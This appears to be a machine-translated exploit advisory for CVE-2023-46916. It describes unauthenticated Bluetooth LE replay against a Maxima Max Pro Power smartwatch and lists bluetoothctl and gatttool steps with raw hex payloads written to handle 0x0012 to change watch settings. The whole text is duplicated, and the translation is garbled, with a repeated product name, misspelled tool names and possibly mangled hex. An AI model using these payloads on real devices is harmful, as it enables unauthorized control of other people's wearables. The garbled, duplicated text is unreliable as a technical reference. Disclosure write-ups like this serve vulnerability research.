#利用标题: Maxima Max Pro Pro Pro -Pro -Pro -Pro -Pro -Pro -Pro Power -BLE流量重播(未经身份验证)
#日期: 13-NOV-2023
#利用作者: Alok Kumar([email protected]),CyberPWN Technologies Pvt。有限公司
#供应商homepage: https://www.maximowatches.com
#产品link: https://www.maximowatches.com/products/max-pro-power
#固件版本: V1.0 486a
#测试在: Maxima Max Pro Power
#CVE : CVE-2023-46916
#据观察,攻击者可以将手工制作的十六进制值发送到手表上的“0x0012” gatt特性手柄,以执行未经授权的操作,例如更改时间显示格式,更新时间,更新通知。
#既然没有手表收到的数据的完整性检查,则攻击者可以在智能手表A上嗅探相同的值,后来可以将其发送到智能手表B领导未经授权的操作
#通过使用任何功能强大的扫描仪,在此“ sudo bluetoothctl扫描”中使用蓝牙扫描仪扫描蓝牙LE设备。
#“ sudo gattool -i”在交互式模式下启动gattool。
#“连接mac_of_device_from_step_1”连接到指定的BLE设备。
#“ char-desc”列出了设备的所有手柄。
#在连接以设置为活动连接的MTU之后,在Gatttool中运行“ MTU 247”。
#在Gatttool中运行“ Char-Read-Hnd0x0054”。提示时,请在攻击者的机器上信任并授权该设备。
#'char-write-req0x0012 AB00000E542222022022002B000900000059FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF'disables提出唤醒功能。
# 'char-write-req0x0012 ab00000ec42f002302002b0009010000059ffffffffff' enables Raise to wake feature.
#'Char-Write-Req0x0012 AB000009C2EE0034050023000400030501'开始心率监视
#'char-write-req0x0012 AB000007C323001902001800020002'将时间格式设置为智能手表上的24小时。
#“ char-write-req0x0012 AB00000700222001802001800020006”将时间格式设置为智能手表上的12小时。
#日期: 13-NOV-2023
#利用作者: Alok Kumar([email protected]),CyberPWN Technologies Pvt。有限公司
#供应商homepage: https://www.maximowatches.com
#产品link: https://www.maximowatches.com/products/max-pro-power
#固件版本: V1.0 486a
#测试在: Maxima Max Pro Power
#CVE : CVE-2023-46916
#据观察,攻击者可以将手工制作的十六进制值发送到手表上的“0x0012” gatt特性手柄,以执行未经授权的操作,例如更改时间显示格式,更新时间,更新通知。
#既然没有手表收到的数据的完整性检查,则攻击者可以在智能手表A上嗅探相同的值,后来可以将其发送到智能手表B领导未经授权的操作
#通过使用任何功能强大的扫描仪,在此“ sudo bluetoothctl扫描”中使用蓝牙扫描仪扫描蓝牙LE设备。
#“ sudo gattool -i”在交互式模式下启动gattool。
#“连接mac_of_device_from_step_1”连接到指定的BLE设备。
#“ char-desc”列出了设备的所有手柄。
#在连接以设置为活动连接的MTU之后,在Gatttool中运行“ MTU 247”。
#在Gatttool中运行“ Char-Read-Hnd0x0054”。提示时,请在攻击者的机器上信任并授权该设备。
#'char-write-req0x0012 AB00000E542222022022002B000900000059FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF'disables提出唤醒功能。
# 'char-write-req0x0012 ab00000ec42f002302002b0009010000059ffffffffff' enables Raise to wake feature.
#'Char-Write-Req0x0012 AB000009C2EE0034050023000400030501'开始心率监视
#'char-write-req0x0012 AB000007C323001902001800020002'将时间格式设置为智能手表上的24小时。
#“ char-write-req0x0012 AB00000700222001802001800020006”将时间格式设置为智能手表上的12小时。